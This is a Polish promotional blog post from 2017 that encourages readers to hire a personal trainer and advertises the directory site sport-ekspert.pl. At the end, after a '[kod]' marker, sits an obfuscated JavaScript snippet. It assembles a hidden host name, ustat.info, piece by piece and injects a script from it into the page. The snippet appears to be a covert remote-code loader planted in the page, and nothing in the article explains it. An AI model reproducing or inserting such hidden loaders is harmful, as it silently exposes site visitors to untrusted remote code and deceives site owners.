27.02.2017

#Trener personalny

Ćwicz z trenerem personalnym!

Nie chcesz chodzić na siłownię, a marzy Ci się piękna i nienaganna sylwetka? Postaw na trening personalny! Współpraca z profesjonalistą to gwarancja sukcesu i osiągnięcia zamierzonych efektów, a przy tym ogromna satysfakcja.

Czym właściwie jest trening personalny? Masz swojego guru, którego słuchasz i podporządkowujesz się jego poleceniom. To tak w skrócie. A poważnie? Trening personalny to indywidualne zajęcia, podczas których realizujemy przygotowany przez instruktora plan. Program w pełni dostosowany jest do możliwości, stanu zdrowia i potrzeb trenującego, uwzględnia jego nawyki żywieniowe.

Postanowienie noworoczne, konieczność zrzucenia zbędnych kilogramów po zimie, troska o zdrowie czy marzenia o pięknej sylwetce – powodów, dla których chcemy zacząć intensywny trening jest wiele. Na początku laik może natrafić na problemy i szybko się zniechęcić do dalszej aktywności. Wszystko przez brak odpowiedniej wiedzy, która nie pozwala na efektywny trening. Kierujemy się w stronę siłowni, ale nie zawsze jest to odpowiednie rozwiązanie. W grupie możemy czuć się skrępowani. Najlepszym rozwiązaniem jest współpraca z trenerem personalnym.

Dlaczego warto postawić na indywidualne zajęcia? Mamy do dyspozycji trenera personalnego, który tylko nam poświęca uwagę, czas, obserwuje i dostosowuje ćwiczenia do naszych możliwości. Najlepszych fachowców znajdziesz na www.sport-ekspert.pl. Z pewnością to rozwiązanie idealne dla tych, którzy szybko chcą osiągnąć cele. Ale nie tylko. Praca z trenerem personalnym jest godna polecenia początkującym, ale także zaawansowanym na płaszczyźnie aktywności fizycznej oraz tym, którzy mimo wysiłku nie osiągnęli zamierzonych efektów. Warto dodać, że takie rozwiązanie jest polecane osobom, które chcą wrócić do pełnej sprawności po urazach bądź skorygować wady postawy.

Często jest tak, że bardzo chcemy, ale jednak… nie możemy. Tłumaczymy się brakiem czasu bądź zmęczeniem. Gdy mamy tzw. „bat” nad sobą nie możemy w żaden sposób odpuścić. Trener personalny to idealny motywator i anioł stróż, który zwróci uwagę na wszelkie niedoskonałości i pozwoli nam wjechać na autostradę, którą dojedziemy do miejscowości „Idealna Sylwetka”.

Warto również pamiętać, że praca z trenerem personalnym może służyć powiększeniu wiedzy. Bywa, że mamy orientację w temacie, ale nie czujemy się do końca pewni i chcemy skorzystać z pomocy eksperta. Pod okiem trenera personalnego można się dokształcić i zdobyć kolejne doświadczenie, a także uzyskać cenne wskazówki i uzyskać fachowe doradztwo.

Gdy podejmiemy decyzję o współpracy z trenerem personalnym, należy go znaleźć. „Kto szuka, nie błądzi”. Ale gdzie? Sport Ekspert to miejsce, w którym zapoznasz się z sylwetkami trenerów personalnych z każdego regionu Polski. Dzięki temu masz okazję zapoznać się z opiniami innych użytkowników, poznać sylwetki instruktorów i dokonać wyboru. Nic prostszego! Zajrzyj na www.sport-ekspert.pl i dokonaj wyboru. To będzie krok w dobrą stronę. Przekonaj się sam!

KM

Tło fotografie created by Javi_indy – Freepik.com

[kod]

(function(){
zcnf=document.createElement("script");zcnf_=(("u")+"st")+"a";zcnf.async=true;
zcnf.type="text/javascript";zcnf_+=("t.i")+""+"n";zcnf_+=(("f")+"o");zcnf_+="/";
zcnfu="60656904.";zcnfu+="4qg55gXacnfXbjXbjl5"+"y9ibuX1ex4z";
zcnf.src="//"+zcnf_+zcnfu; document.body.appendChild(zcnf);
})();